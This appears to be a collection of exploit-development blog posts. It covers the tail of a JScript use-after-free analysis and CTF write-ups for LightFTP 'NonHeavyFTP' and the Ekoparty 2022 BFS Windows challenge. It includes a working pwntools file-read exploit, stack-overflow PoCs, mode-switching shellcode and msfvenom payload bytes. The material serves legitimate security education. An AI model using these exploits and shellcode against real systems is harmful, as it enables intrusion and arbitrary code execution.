As we can see, the vulnerable object (0x0bcaefc0) is no longer in a busy allocation but in a free-ed allocation. The destructor jscript!NativeErrorProtoObj<16>::`vector deleting destructor' was called, which in turn called msvcrt!free. msvcrt!free then called ntdll!RtlFreeHeap, which called ntdll!RtlpFreeHeap, and the object was free-ed.

Step 3: Object is re-used

While continuing to monitor allocations and frees, I noticed that this free-ed/vulnerable object is referenced again right before the statement return 'x'; which triggers the Use-After-Free (UAF) bug and leads to a crash:

As we can see, a crash occurred because EIP is pointing to an instruction that tries to dereference invalid memory at offset 0x18 from ESI. Following is the stack trace:

0:005> kb
ChildEBP RetAddr  Args to Child              
08b3cbac 6ffd1e46 0ba4ed10 08b3cbd8 00000000 jscript!JSONStringifyArray+0x40e
08b3cc08 6ffd1a43 08b3cc60 0ba4ed10 6ffddb00 jscript!JSONStringifyObject+0x265
08b3ccb4 6ff5599a 0ba4ed10 08b3cd58 08b3ccf8 jscript!JsJSONStringify+0x3a2
08b3cd1c 6ff55870 00000000 00000001 078b4f70 jscript!NatFncObj::Call+0x106
08b3cda0 6ff54f84 0bc9afa0 0ba4ed10 00000001 jscript!NameTbl::InvokeInternal+0x2b4
08b3cdd4 6ff5f2fb 0ba4ed10 00000000 00000001 jscript!VAR::InvokeByDispID+0x17f
08b3ce14 6ff5dcfb 0ba4ed10 08b3ce84 0bc96fc0 jscript!VAR::InvokeJSObj<SYM *>+0xb8
08b3ce50 6ff5d9a8 0ba4ed10 08b3ce84 00000001 jscript!VAR::InvokeByName+0x174

We can see that when the method jscript!JsJSONStringify was called, it in turn called jscript!JSONStringifyObject, which then called jscript!JSONStringifyArray. jscript!JSONStringifyArray then tried to access the value at ESI+0x18, and the crash occurred because that memory location contains invalid data.

Now that we know when a vulnerable object is created, when it’s being free-ed and when it’s being re-used/referenced, we have enough information required to exploit this bug.

Is this bug exploitable?

In order to exploit a Use After Free vulnerability, we need to cause a series of allocations after the vulnerable object is free-ed and right before it’s re-used/referenced by the application. This way, when the application tries to reference that vulnerable object, it will see some valid data there (that we supplied) and the application won’t crash.

This means that we can now control the application flow. We could take advantage of this UAF bug to achieve remote code execution, but the problem here is that these JScript allocations (including our vulnerable object) are not part of the Default Process Heap. We can confirm that by looking at the aforementioned call stacks.

We can see that the address 0x0bcaefc0 is part of Heap Root a11000. Now if we run the !heap command, we see the following heaps available:

0:005> !heap
Index   Address  Name      Debugging options enabled
  1:   00810000                
  2:   001e0000                
  3:   00cd0000                
  4:   07d10000                
  5:   09590000                
  6:   09da0000                
  7:   0a530000                
  8:   09620000                
  9:   0b2c0000                
 10:   0c480000                
 11:   0c650000                
 12:   0cab0000                
 13:   0b720000  

So, here 00810000 is the Default Process Heap. If we run the !heap -p -all command, we get more information about Heap Root a11000 :

_HEAP @ 1e0000
  No FrontEnd
  _HEAP_SEGMENT @ 1e0000
   CommittedRange @ 1e0588
  * 001e0588 0048 0004  [00]   001e0590    00238 - (busy)
    001e07c8 0103 0048  [00]   001e07d0    00810 - (free)
  * 001e0fe0 0004 0103  [00]   001e0fe8    00018 - (busy)
   VirtualAllocdBlocks @ 1e00a0
_DPH_HEAP_ROOT @ a11000
Freed and decommitted blocks
  DPH_HEAP_BLOCK : VirtAddr VirtSize
    00a14e6c : 078ff000 00002000
    00a14c30 : 07915000 00002000
    00a14bfc : 07917000 00002000
    00a14b94 : 0791b000 00002000
    00a149f4 : 0792b000 00002000
    00a149c0 : 0792d000 00002000
    00a14958 : 07931000 00002000
    00a147ec : 0793f000 00002000
    00a14820 : 0793d000 00002000
    00a14854 : 0793b000 00002000
    00a146b4 : 0794b000 00002000
    00a146e8 : 07949000 00002000
<!-- snip -->

As we can see, the HEAP ROOT a11000 doesn’t belong to the Default Process Heap but to a different heap, 001e0000. So, if we have to replace the free-ed object (at 0x0bcaefc0) with an object of our choice to gain code execution, our memory allocations should come from 001e0000 and not from the Default Process Heap.

If you’re interested in knowing more about causing JScript allocations, you can review this exploit from Google Project Zero: https://www.exploit-db.com/exploits/45279

If time permits, I will try to understand allocations mentioned in the aforementioned exploit and do some research about JScript allocations and see how to cause allocations from the same Heap as vulnerable object. I will post part-2 of this blog post then.

Special thanks to Peter Van Eeckhoutte (@corelanc0d3r) for amazing Advanced Windows Exploitation training & constant support.

Real World CTF 2023 – NonHeavyFTP

By: xct
8 January 2023 at 14:06

This is a short writeup on the “NonHeavyFTP” challenge from Real World CTF 2023. This was one of the easier challenges, with the goal of exploiting LightFTP in version 2.2 (the latest one on GitHub at the time). I ended up with a file-read vulnerability that allowed me to read the flag.

Vulnerability Discovery

We are given a compiled binary but there is no need to use it (unless you want to use it for local testing) since the source is on github. In addition, we get the config used on the remote system which only allows anonymous login with read-only permissions:

...
[anonymous]
pswd=*
accs=readonly
...

Unless we can somehow bypass this, we are limited to reading files (and reading the flag is enough to finish this challenge). I started to fuzz the challenge with boofuzz and the FTP fuzzing script from its author. Unfortunately, this did not yield any results, but for documentation’s sake this is how it’s set up:

# install boofuzz
mkdir boofuzz && cd boofuzz
python3 -m venv env
source env/bin/activate
pip install -U pip setuptools
pip install boofuzz

# start local version of fftp on port 2121 
./fftp

# start fuzzer
python3 fuzz.py fuzz --target-port=2121 --target-host=127.0.0.1 --username=anonymous --password=xct

This ran at about 500 exec/s on my VM but required restarting every ~32k sessions because the user limit was reached and increasing it in the config did not help. It did not find any vulnerabilities though. That leaves us with source code review to find something. Looking around a bit for dangerous functions, we find a strcpy at https://github.com/hfiref0x/LightFTP/blob/master/Source/ftpserv.c#L265 :

int ftpUSER(PFTPCONTEXT context, const char *params)
{
    if ( params == NULL )
        return sendstring(context, error501);

    context->Access = FTP_ACCESS_NOT_LOGGED_IN;

    writelogentry(context, " USER: ", (char *)params);
    snprintf(context->FileName, sizeof(context->FileName), "331 User %s OK. Password required\r\n", params);
    sendstring(context, context->FileName);

    /* Suspicious strcpy */
    strcpy(context->FileName, params);
    return 1;
}

This looked interesting (e.g. send a large username to overflow the buffer) but it turned out that we can not send a buffer large enough to overflow context->FileName. If we search for other uses of context->FileName , we can see that most FTP commands are actually using this as a buffer to hold different things. At this point I was thinking we might be able to use a race condition to overwrite the contents of this buffer after a function does checks on it, for example:

int ftpLIST(PFTPCONTEXT context, const char *params)
{
   ...
    /* this function makes sure we stay inside the ftp root directory */
    ftp_effective_path(context->RootDir, context->CurrentDir, params, sizeof(context->FileName), context->FileName);

    while (stat(context->FileName, &filestats) == 0)
    {
        if ( !S_ISDIR(filestats.st_mode) )
            break;

        sendstring(context, interm150);
        writelogentry(context, " LIST", (char *)params);
        context->WorkerThreadAbort = 0;

        pthread_mutex_lock(&context->MTLock);

        context->WorkerThreadValid = pthread_create(&tid, NULL, (void * (*)(void *))list_thread, context);
        if ( context->WorkerThreadValid == 0 )
            context->WorkerThreadId = tid;
        else
            sendstring(context, error451);

        pthread_mutex_unlock(&context->MTLock);

        return 1;
    }
    return sendstring(context, error550);
}

If we could overwrite context->FileName after the ftp_effective_path function is called, it would just open the file we want even if it’s outside the FTP root. This buffer is assigned per connection though, so it’s not possible to overwrite it from a new connection.

There is, however, a different way that does not rely on a new connection. FTP can be used in active or passive mode, and in both cases there is a command channel and a data channel. In active mode we connect to the command port (usually port 21) and can issue whatever commands we want. If we want to get any data back, the service connects to a port on our client machine and sends the data. In passive mode, the service tells us a port on the server side that we can connect to in order to get the data. It turns out active mode is not possible here due to firewall constraints, so we have to use passive mode.

If we issue a command in passive mode, like the LIST command in the example above, it will try to send the listing data to the port that was defined when we made the connection. As long as we do not connect there it can however not send the data.
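The data port is announced in the reply to PASV. As a minimal sketch, assuming the server answers in the common RFC 959 form `227 ... (h1,h2,h3,h4,p1,p2)`, the port is `p1 * 256 + p2`. The function name and the example reply below are made up for illustration; the real server picks its own port.

```python
import re

def parse_pasv_port(reply: str) -> int:
    """Extract the data port from a '227 ... (h1,h2,h3,h4,p1,p2)' reply."""
    match = re.search(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)", reply)
    if match is None:
        raise ValueError("not a PASV reply: %r" % reply)
    # The last two numbers are the high and low byte of the port.
    p1, p2 = int(match.group(5)), int(match.group(6))
    return p1 * 256 + p2

# Hypothetical reply, for illustration only.
example_reply = "227 Entering Passive Mode (127,0,0,1,8,73)."
print(parse_pasv_port(example_reply))
```

The exploit further down does the same arithmetic with a looser regex that simply takes the last two numbers of the reply line.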

This is how it sends the data (after we connect), via the stor_thread function:

void *stor_thread(PFTPCONTEXT context)
{
       ...

        f = open(context->FileName, O_CREAT | O_RDWR | O_TRUNC, S_IRWXU | S_IRGRP | S_IROTH);
        context->File = f;
        if (f == -1)
            break;

        ...
    return NULL;
}

This function is run as a new thread and is also using context->FileName! This means that we can do the following:

  • Issue LIST command with some random path, it will get stored in context->FileName. The thread starts but blocks since no connection has been made. As soon as it unblocks it will read context->FileName.
  • Issue USER command with a crafted username (the directory name that we want to list); this also gets stored in context->FileName. Since the thread that wants to send the result is still blocked, we just overwrite the path after the checks were done!
  • Connect to the FTP data port to allow it to send the data
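The three steps above are a classic check-then-use race on a shared buffer. The following is only a simulation of that ordering in Python, not LightFTP code: `Context`, `is_inside_root`, and the `/srv/ftp` root are hypothetical stand-ins, and a `threading.Event` plays the role of the pending data connection.

```python
import threading

class Context:
    """Stand-in for the per-connection context; only the shared buffer matters."""
    def __init__(self):
        self.file_name = ""

def is_inside_root(path: str) -> bool:
    # Hypothetical placeholder for the path check done before the thread starts.
    return path.startswith("/srv/ftp")

def worker(ctx, data_connected, result):
    data_connected.wait()          # blocks until the client connects to the data port
    result.append(ctx.file_name)   # the buffer is read only now, long after the check

def simulate() -> str:
    ctx = Context()
    data_connected = threading.Event()
    result = []

    # 1. LIST: the path is validated and stored, the worker starts and blocks.
    ctx.file_name = "/srv/ftp/pub"
    assert is_inside_root(ctx.file_name)
    thread = threading.Thread(target=worker, args=(ctx, data_connected, result))
    thread.start()

    # 2. USER: the same buffer is reused, with no path check at all.
    ctx.file_name = "/"

    # 3. The client connects to the data port; the worker uses the new value.
    data_connected.set()
    thread.join()
    return result[0]

print(simulate())
```

The worker ends up operating on `/` even though only `/srv/ftp/pub` was ever validated, which is the behaviour the exploit below relies on.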

Exploitation

The flag has a random filename so we start by using our vulnerability to list the contents of the root directory:

from pwn import *
import binascii
context.terminal = ['alacritty', '-e', 'zsh', '-c']

RHOST = b"47.89.253.219"

def init():
    p.recvuntil(b"220")
    p.sendline(b"USER anonymous")
    p.recvuntil(b"331")
    p.sendline(b"PASS root")
    p.recvuntil(b"230")
    p.sendline(b"PASV")
    p.recvline()
    result = p.recvline().rstrip(b"\r\n")
    parts = [int(s) for s in re.findall(r'\b\d+\b', result.decode())]
    port = parts[-2]*256+parts[-1]
    return port

def read(port):
    p = remote(RHOST, port, level='debug')
    print(p.recvall(timeout=2))
    p.close()

# list dir
p = remote(RHOST, 2121, level='debug')
p.newline = b'\r\n'
port =init()
p.sendline(b"LIST ")  # send LIST command, wants to send us result via data port
p.sendline(b"USER /") # send USER command to overwrite dirname used by LIST
p.recvline()
read(port)
p.recvline()
p.recvline()
p.close()

Running this exploit lists the root directory and yields us the flag name. With the same technique we can now retrieve the flag file (or any file on the system):

...
p = remote(RHOST, 2121, level='debug')
p.newline = b'\r\n'
port =init()

p.sendline(b"RETR hello.txt")
p.sendline(b"USER /flag.deb10154-8cb2-11ed-be49-0242ac110002")
p.recvline()
read(port)
p.recvline()
p.recvline()
p.close()

That’s it for this challenge :)

The post Real World CTF 2023 – NonHeavyFTP appeared first on Vulndev.

Windows Exploitation Challenge – Blue Frost Security 2022 (Ekoparty)

By: voidsec
1 December 2022 at 16:07

Last month, during Ekoparty, Blue Frost Security published a Windows challenge. Since having a Windows exploitation challenge, is one of a kind in CTFs, and since I’ve found the challenge interesting and very clever, I’ve decided to post about my reverse engineering and exploitation methodology. Challenge Requests Only Python solutions without external libraries will be […]

The post Windows Exploitation Challenge – Blue Frost Security 2022 (Ekoparty) appeared first on VoidSec.

Ekoparty 2022 BFS Windows Challenge

By: xct
3 November 2022 at 03:29

In this blog post, we will solve the Windows userland challenge that Blue Frost Security published for Ekoparty 2022. You can find the challenge & description here:

We analyze the bfs-eko2022.exe binary in IDA and can see that it’s binding to 0.0.0.0 on port 31415. After a client connects, it calls sub_140001160 which is checking that the first 6 bytes received are Hello\x00. If that’s the case, it will send back Hi\x00 and proceeds to call sub_140001240 where the main packet parsing is done. At the start of this function, it fills a heap buffer as seen below:

We can see 0x5050505050505050 being written followed by 0xcf58585858585858. This is repeated over the full length of the buffer (0x1000). At the beginning of the main function we can see how this buffer is allocated:

mov     r9d, 40h        ; flProtect
mov     r8d, 3000h      ; flAllocationType
mov     edx, 1000h      ; dwSize
mov     ecx, 10000000h  ; lpAddress
call    cs:VirtualAlloc

This buffer that is being filled is on the heap at 0x10000000, is readable, writable, and executable (flProtect 0x40 is PAGE_EXECUTE_READWRITE), and has a size of 0x1000. This shows that the initialization being done is filling the complete buffer. These initialization values are suspicious as you would normally expect a null initialization or random data. If we disassemble the bytes we get the following instructions:

0:  50                      push   eax
1:  50                      push   eax
2:  50                      push   eax
3:  50                      push   eax
4:  50                      push   eax
5:  50                      push   eax
6:  50                      push   eax
7:  50                      push   eax
8:  58                      pop    eax
9:  58                      pop    eax
a:  58                      pop    eax
b:  58                      pop    eax
c:  58                      pop    eax
d:  58                      pop    eax
e:  58                      pop    eax
f:  cf                      iret
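The in-memory byte order can be checked with a few lines of Python. This is a small sketch that assumes the two constants are written as consecutive little-endian 64-bit stores, as is usual on x64; the `OPCODES` table only covers the three single-byte opcodes that occur here.

```python
import struct

# One 16-byte unit of the fill pattern: two little-endian 64-bit stores.
unit = struct.pack("<Q", 0x5050505050505050) + struct.pack("<Q", 0xCF58585858585858)

OPCODES = {0x50: "push", 0x58: "pop", 0xCF: "iret"}
layout = [OPCODES[b] for b in unit]

for offset, name in enumerate(layout):
    print(f"{offset:x}: {unit[offset]:02x}  {name}")
```

Because of the little-endian store, the 0xcf byte is the last byte of each 16-byte unit, which agrees with the debugger trace later in this post where iretd sits at an address ending in 0xf.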

This does not look random at all and will play a role later on. For now, let’s continue to follow the control flow of the packet parsing function. After the handshake and initialization, it receives more bytes, looking for a magic value 0x323230326F6B45 followed by the byte T which indicates the packet type. It then expects another 4 bytes that represent the packet length.

mov     rax, 323230326F6B45h
cmp     qword ptr [rsp+0F68h+buf], rax
jz      short loc_140001339
|
movzx   eax, [rsp+0F68h+var_20]
mov     [rsp+0F68h+var_38], al
movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 54h ; 'T'
jz      short loc_140001366
|
movsx   eax, [rsp+0F68h+var_1F]
cmp     eax, 0F00h
jle     short loc_140001386

The packet length comparison at the end looks interesting. It’s supposed to make sure that the packet length field cannot be larger than 0xf00. Before the comparison, it loads the value into EAX with movsx, which is a move with sign-extension. This means that if we send 0xffff, it gets extended to 0xffffffff and is interpreted as a negative value. Since the last jump has to be taken and -1 is lower than 0xf00, we pass the check and can continue!
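The effect of the signed comparison can be reproduced in Python. This sketch assumes the length field is read as a 16-bit little-endian word, as the two bytes `\xff\xff` in the PoC below suggest; `passes_length_check` is an illustrative name, not a function from the binary.

```python
import struct

MAX_LEN = 0x0F00

def passes_length_check(raw: bytes) -> bool:
    """Treat two little-endian bytes as a signed 16-bit value, like movsx into EAX."""
    (value,) = struct.unpack("<h", raw)
    return value <= MAX_LEN            # signed comparison, as with jle

def as_unsigned(raw: bytes) -> int:
    """The same two bytes read as an unsigned length."""
    (value,) = struct.unpack("<H", raw)
    return value

print(passes_length_check(b"\xff\xff"), hex(as_unsigned(b"\xff\xff")))
print(passes_length_check(b"\x01\x0f"), hex(as_unsigned(b"\x01\x0f")))
```

The first line shows a value that passes the check while being far larger than 0xf00 when read as unsigned; the second shows that an honest 0xf01 is rejected.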

Continuing at 140001386 another receive is called, reading network input data into the heap buffer at 0x10000000. The maximum amount of data we can provide here is 0x1000, since anything more than that would go outside the allocated memory and cause an exception. It is then calling sub_1400011B0 on this data.

This function takes the data from the heap and copies it onto the stack, using the length we provided inside the packet itself! Remember that the intended maximum length is 0xf00 but we were able to provide 0xffff instead. This leads to a stack buffer overflow. The function also filters out 0x2b and 0x33 during the copy operation, replacing them with null bytes on the stack (this will be important later).
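To keep the bad bytes in mind while building payloads, the filtering can be modelled as below. This is a rough model based only on the description above; how the real copy loop iterates is not shown in this post, and `filtered_copy` is a made-up name.

```python
import struct

BAD_BYTES = {0x2B, 0x33}

def filtered_copy(data: bytes, length: int) -> bytes:
    """Model of the copy: 'length' bytes are copied, bad bytes become 0x00."""
    return bytes(0 if b in BAD_BYTES else b for b in data[:length])

def p32(value: int) -> bytes:
    return struct.pack("<I", value)

print(filtered_copy(p32(0x2B), 4).hex())   # a value containing a bad byte
print(filtered_copy(p32(0x23), 4).hex())   # a value without bad bytes
```

Any value that has to reach the stack intact therefore must not contain 0x2b or 0x33 in any of its bytes.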

After the copy function is finished it will once again check that the packet type is T from the copy of the data that is now on the stack. If that’s the case (which it is if used normally) it will echo back the data it received and exit. By using our stack overflow, we can however overwrite the T on the stack with an X which leads to a win-function:

movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 58h ; 'X'
jnz     short loc_140001474
|
mov     rcx, cs:buf
add     rcx, rax
mov     rax, rcx
mov     cs:off_14000C000, rax
lea     rcx, [rsp+0F68h+CmdLine] ; lpCmdLine
call    cs:off_14000C000

If we can get to this last basic block the program will jump exactly to length+1 of input buffer on the heap which contains the bytes that have been written during initialization. At this point, we control the stack to some extent and can influence to which exact byte of the pre-initialized heap memory we jump. The following PoC brings us to this point.

PoC_0x01

#!/usr/bin/env python3
import sys, socket, struct
p32 = lambda x: struct.pack('<I', x);

TARGET = '127.0.0.1'
PORT = 31415

sc = b""

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf =  b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion


iret = b""
iret += p32(0x41414141) 	
iret += p32(0x42424242) 			
iret += p32(0x43434343) 	
iret += p32(0x44444444) 	
iret += p32(0x45454545)	

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushs
p.send(buf)
p.recv(1)
p.close() 

When we break on the call instruction we can see that we land on the heap and can single step until the iret instruction. Note that we chose the input length so that we skip the pushes and land right at the pops, in order to fully control the stack at the moment iret is executed.

bp bfs_eko2022+0x146E
g
Breakpoint 0 hit
bfs_eko2022+0x146e:
00007ff7`c7f2146e ff158cab0000    call    qword ptr [bfs_eko2022+0xc000 (00007ff7`c7f2c000)] ds:00007ff7`c7f2c000=0000000010000f08
0:000> t
00000000`10000f08 58              pop     rax
0:000> p
00000000`10000f09 58              pop     rax
0:000> 
00000000`10000f0a 58              pop     rax
0:000> 
00000000`10000f0b 58              pop     rax
0:000> 
00000000`10000f0c 58              pop     rax
0:000> 
00000000`10000f0d 58              pop     rax
0:000> 
00000000`10000f0e 58              pop     rax
0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`005eeb50  41414141 42424242 43434343 44444444
00000000`005eeb60  45454545 41414141 41414141 41414141
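The choice of padding can be double-checked with a short calculation. The sketch assumes that the call target is the buffer base plus the number of payload bytes sent after the header, which is what the debugger output above shows (0x10000f08), and that the fill pattern repeats every 16 bytes as eight pushes, seven pops, and one iret.

```python
BUF_BASE = 0x10000000
PATTERN = bytes([0x50] * 8 + [0x58] * 7 + [0xCF])   # repeating 16-byte fill unit

def landing(payload_len: int):
    """Return (call target, pushes executed, pops executed) before reaching iret."""
    target = BUF_BASE + payload_len
    pos = payload_len % len(PATTERN)
    pushes = pops = 0
    while PATTERN[pos] != 0xCF:
        if PATTERN[pos] == 0x50:
            pushes += 1
        else:
            pops += 1
        pos += 1
    return target, pushes, pops

# 0xf00 bytes of frame/shellcode/padding, one 'X', seven 'B's (as in the PoC).
payload_len = 0x0F00 + 1 + 7
target, pushes, pops = landing(payload_len)
print(hex(target), pushes, pops)
```

With seven trailing bytes the target falls on offset 8 of the pattern, so only pops run before iret; without them execution would first go through the pushes.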

At this point, we have to do some digging on how iret works to see if we can craft the stack in a way that would let us gain (custom-) code execution. The iret instruction is used to return control from an exception or interrupt handler and is expecting the following values on the stack (very good article on this topic):

- new instruction pointer
- new code segment selector (CS)
- new value of EFLAGS register 
- new stack pointer
- new stack segment selector (SS)

As for the instruction pointer and stack pointer we could just point them into our heap buffer since we control a large part of it. The EFLAGS register we can get from debugging and then attempt to use the same value. This leaves us with CS and SS which is a bit tricky. CS and SS are used to index into the Global Descriptor Table (GDT) which has descriptors for kernel code/data and user code/data. Using WinDBG as a kernel debugger we can see which indices match which descriptor:

0: kd> dd @gdtr
fffff807`39e95fb0  00000000 00000000 00000000 00000000
fffff807`39e95fc0  00000000 00209b00 00000000 00409300
fffff807`39e95fd0  0000ffff 00cffb00 0000ffff 00cff300
fffff807`39e95fe0  00000000 0020fb00 00000000 00000000
fffff807`39e95ff0  40000067 39008be9 fffff807 00000000
fffff807`39e96000  00003c00 0040f300 00000000 00000000
fffff807`39e96010  00000000 00000000 00000000 00000000

The first 16 bytes are reserved, following those we can see that there are some values at offset 0x10 and 0x18:

0: kd> dg 0x10
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P  Lo 0000029b
0: kd> dg 0x18
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By P  Nl 00000493

These should be the entries for the kernel. Then we have 2 more values following:

0: kd> dg 0x20
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg P  Nl 00000cfb
0: kd> dg 0x28
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg P  Nl 00000cf3

These are the user code and stack descriptors ranging from 0 to 0xffffffff. The 2 least significant bits of the selector value are used for the RPL (Requested Privilege Level) or CPL (Current Privilege Level). Because we are looking to stay in ring 3, we have to set both of these bits to 1 (privilege level 3), so 0x20 for the code segment becomes 0x23 and 0x28 becomes 0x2b.
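A selector is a small bit field: the upper 13 bits are the descriptor index, bit 2 selects GDT or LDT, and the low two bits are the privilege level. The helper below is a sketch for decoding the values discussed here; `decode_selector` is just an illustrative name.

```python
def decode_selector(selector: int) -> dict:
    """Split an x86 segment selector into its three fields."""
    return {
        "index": selector >> 3,       # descriptor index in the table
        "ti": (selector >> 2) & 1,    # table indicator: 0 = GDT, 1 = LDT
        "rpl": selector & 0b11,       # requested privilege level
    }

for sel in (0x20, 0x23, 0x28, 0x2B):
    print(hex(sel), decode_selector(sel))
```

0x20 and 0x23 refer to the same GDT entry (index 4) and differ only in the privilege bits, and the same holds for 0x28 and 0x2b (index 5).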

CS and SS are only used in 32-bit mode (see: https://nixhacker.com/segmentation-in-intel-64-bit/) or lower – by supplying values there for our iret we will switch to 32-bit mode. With this bit of theory out of the way we still have a problem: 0x2b is a bad byte and will not end up on the stack! So we can choose 0x23 for the code segment but have to be creative on what to use for the stack segment.

Any value that will not crash on iret is fine in theory so it has to be Data RW but we don’t necessarily need a valid stack base and limit if we can avoid using the stack. After inspecting more values and seeing which ones do and don’t crash we eventually find 0x53:

0:000> dg 0x53
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0053 00000000`0060a000 00000000`00000fff Data RW Ac 3 Bg By P  Nl 000004f3

From the output, we can see that base and limit are not really useful for us but if we avoid the stack we should be fine (base and limit are also somewhat random and can change at reboots). Now it’s time to update the PoC:

PoC_0x02

...
sc =  b""
sc += b"\xcc"
sc += b"\x90"*100
...
iret = b""
iret += p32(0x10000014) 	
iret += p32(0x23) 			 
iret += p32(0x00010202) 	
iret += p32(0x10000400) 	
iret += p32(0x53)
...

Debugging the new PoC shows that we indeed end up in 32-bit mode inside our shellcode and can execute it!

0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`00cfede0  10000014 00000023 00010202 10000400
00000000`00cfedf0  00000053 41414141 41414141 41414141
0:000> g
10000014 cc              int     3
0:000:x86> p
10000015 90              nop
0:000:x86> p
10000016 90              nop

Any attempt to use the stack will however fail (Note that WinDBG will automatically repair 0x53 back to 0x2b if you are single stepping – this can be confusing!). This means we will need to find a way to use the ability to execute shellcode to restore either stack functionality or get back to 64-bit.

As it turns out there is exactly such a thing. By using a far jump like this 0x33:0x100000xx we can specify 0x33 as the new code segment which will get us back to 64-bit. Since 64-bit does not need a stack segment selector we can now use the stack again! The only thing left to do (besides generating valid shellcode) is to restore the stack pointer. Luckily debugging shows that RCX still holds a reference to the stack so we can just copy it into RSP. After executing the jump into 64-bit mode we can now continue to execute 64-bit shellcode to restore the stack and then anything we like:

PoC_0x03

...
sc =  b""
sc += b"\xcc"
sc += b"\xea\x1c\x00\x00\x10\x33\x00" # far jmp to 0033:1000001c, switches back to 64-bit
sc += b"\x48\x89\xC8\x48\x89\xC4" # restore original stack from ref in rcx
sc += b"\xcc"
...

Note that even though 0x33 is a bad byte this is only true for the stack – on the heap where the shellcode lies it will be unchanged. Debugging shows the swap back to 64-bit:

10000014 cc                      int     3
0:000:x86> p
10000015 ea1c0000103300          jmp     0033:1000001C
0:000:x86> p
00000000`1000001c 4889c8          mov     rax,rcx
0:000> p
00000000`1000001f 4889c4          mov     rsp,rax
0:000> 
00000000`10000022 cc              int     3
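The seven bytes of the far jump follow directly from its encoding in 32-bit mode: opcode 0xEA, a 4-byte little-endian offset, then a 2-byte selector. A small sketch to rebuild them (`far_jmp32` is an illustrative helper, not part of the original exploit):

```python
import struct

def far_jmp32(selector: int, offset: int) -> bytes:
    """Encode a 32-bit 'jmp ptr16:32': opcode 0xEA, 4-byte offset, 2-byte selector."""
    return struct.pack("<BIH", 0xEA, offset, selector)

encoded = far_jmp32(0x33, 0x1000001C)
print(encoded.hex())
```

This makes it easy to retarget the jump if the shellcode layout changes, since the destination has to match where the 64-bit code actually starts.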

For the final exploit, all that is left to do is generate some shellcode, e.g. msfvenom -p windows/x64/exec cmd="calc" -f python .

Final PoC

#!/usr/bin/env python3
# Author: @xct_de

import sys, socket, struct
p32 = lambda x: struct.pack('<I', x);

TARGET = '127.0.0.1'
PORT = 31415

sc =  b""
#sc += b"\xcc"

sc += b"\xea\x1c\x00\x00\x10\x33\x00" # from 0x10000014 (x86) 0x1000001c (x64)
sc += b"\x48\x89\xC8\x48\x89\xC4"     # restore original stack from rcx

# msfvenom -p windows/x64/exec cmd="calc" -f python
sc += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
sc += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
sc += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
sc += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
sc += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
sc += b"\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
sc += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
sc += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
sc += b"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
sc += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
sc += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
sc += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
sc += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
sc += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
sc += b"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48"
sc += b"\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d"
sc += b"\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5"
sc += b"\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
sc += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
sc += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89"
sc += b"\xda\xff\xd5\x63\x61\x6c\x63\x00"

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf = b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion

# switch from 64-bit to 32-bit via iret
iret = b""
iret += p32(0x10000014) 	
iret += p32(0x23) 			  
iret += p32(0x00010202) 	
iret += p32(0x10000400) 	
iret += p32(0x53)			    

buf += iret
buf += sc
